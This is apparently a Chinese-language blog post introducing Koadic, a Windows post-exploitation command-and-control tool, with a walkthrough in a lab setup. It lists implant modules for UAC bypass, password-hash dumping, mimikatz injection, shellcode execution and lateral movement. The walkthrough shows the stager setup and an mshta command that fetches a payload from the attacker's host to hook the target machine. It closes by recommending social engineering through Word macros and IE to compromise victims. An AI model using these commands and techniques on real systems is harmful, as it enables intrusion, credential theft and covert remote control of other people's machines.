后渗透工具Koadic



  • Koadic项目主页

    https://github.com/zerosum0x0/koadic
    3|632x500

    介绍

    Koadic或COM命令与控制,是一个Windows后挖掘rootkit类似于其他渗透测试工具,如Meterpreter和Powershell帝国。主要区别在于,Koadic使用Windows Script Host(又名JScript / VBScript)来执行其大部分操作,在核心中具有兼容性,可以支持Windows 2000的默认安装,并且无需任何Service Pack(甚至可能包括NT4的版本)通过Windows 10。
    有可能从0级到另外级的内存完全在内存中提供有效载荷,还可以使用SSL和TLS(取决于受害者操作系统启用的内容)的加密安全通信。
    Koadic也试图兼容Python 2和Python 3。

    用法

    COMMAND     DESCRIPTION    命令    描述
    ———   ————-
    load        reloads all modules  //显示
    info        shows the current module options//显示当前模块选项。
    use         switch to a different module//切换到不同的模块
    set         sets a variable for the current module//为当前模块设置一个变量
    jobs        shows info about jobs//显示有关工作的信息
    help        displays help info for a command//获取一个cmdshell
    cmdshell    command shell to interact with a zombie// 命令 shell 与僵尸交互
    kill        shows info about jobs//显示有关工作的信息
    listeners   shows info about stagers//显示信息的传输器载荷
    exit        exits the program//退出
    zombies     lists hooked targets//显示所有僵尸会话
    run         runs the current module//运行,和exploit一个样
    verbose     exits the program//退出程序
    

    Stagers

    Stagers是在你攻击机上生成的payload的种类

    Module Description
    stager/js/mshta serves payloads in memory using MSHTA.exe HTML Applications
    stager/js/regsvr serves payloads in memory using regsvr32.exe COM+ scriptlets
    stager/js/rundll32_js serves payloads in memory using rundll32.exe
    stager/js/disk serves payloads using files on disk

    -Implants

    Module Description
    implant/elevate/bypassuac_sdclt Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.
    implant/fun/zombie Maxes volume and opens The Cranberries YouTube in a hidden window.
    implant/fun/voice Plays a message over text-to-speech.
    implant/gather/clipboard Retrieves the current content of the user clipboard.
    implant/gather/hashdump_sam Retrieves hashed passwords from the SAM hive.
    implant/gather/hashdump_dc Domain controller hashes from the NTDS.dit file.
    implant/inject/mimikatz_dynwrapx Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
    implant/inject/mimikatz_dotnet2js Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
    implant/inject/shellcode_excel Runs arbitrary shellcode payload (if Excel is installed).
    implant/manage/enable_rdesktop Enables remote desktop on the target.
    implant/manage/exec_cmd Run an arbitrary command on the target, and optionally receive the output.
    implant/pivot/stage_wmi Hook a zombie on another machine using WMI.
    implant/pivot/exec_psexec Run a command on another machine using psexec from sysinternals.
    implant/scan/tcp Uses HTTP to scan open TCP ports on the target zombie LAN.
    implant/utils/download_file Downloads a file from the target zombie.
    implant/utils/upload_file Uploads a file from the listening server to the target zombies.

    安装与实例

    攻击机(192.168.145.129)
    靶机Win7旗舰版(192.168.145.130)
    
    git clone https://github.com/zerosum0x0/koadic.git
    
    cd koadic
    
    pip install -r requirements.txt
    
    ./koadic
    
    set LHOST 192.168.145.129
    
    set LPORT 6666
    
    info
    

    执行到这 可能会出现这个问题UnicodeDecodeError: ‘ascii’ codec can’t decode byte 0xe5 in position 108: ordinal not in ran

    run
    
    [+] Spawned a stager at http://192.168.145.129:6666/DDEUV
    [!] Avoid manually editing this URL!!!
    [>] mshta http://192.168.145.129:6666/DDEUV
    
    

    在靶机执行

    mshta http://192.168.145.129:6666/DDEUV
    

    执行完以后可以看到靶机已经上线了

    但是现在没有权限 并不能继续搞事情 所以接着就要bypass了

    这里我选eventvwr 其实这两个都可以 不过要注意有时候第一个会打开事件查看器

    同样的 设置好参数就可以了

    接下来 我们试着把一张图片上传到靶机中

    心得

    这个远控不仅可以通过TLS/SSL加密,在后台静默运行也会使攻击更加透明。模块从bypass,哈希和密码的收集以及注入和上传下载文件
    对于使用的场景 通过社工更能发挥这个工具的威力 通过IE和word宏比起cmd命令也更容易让人“中招”。


Log in to reply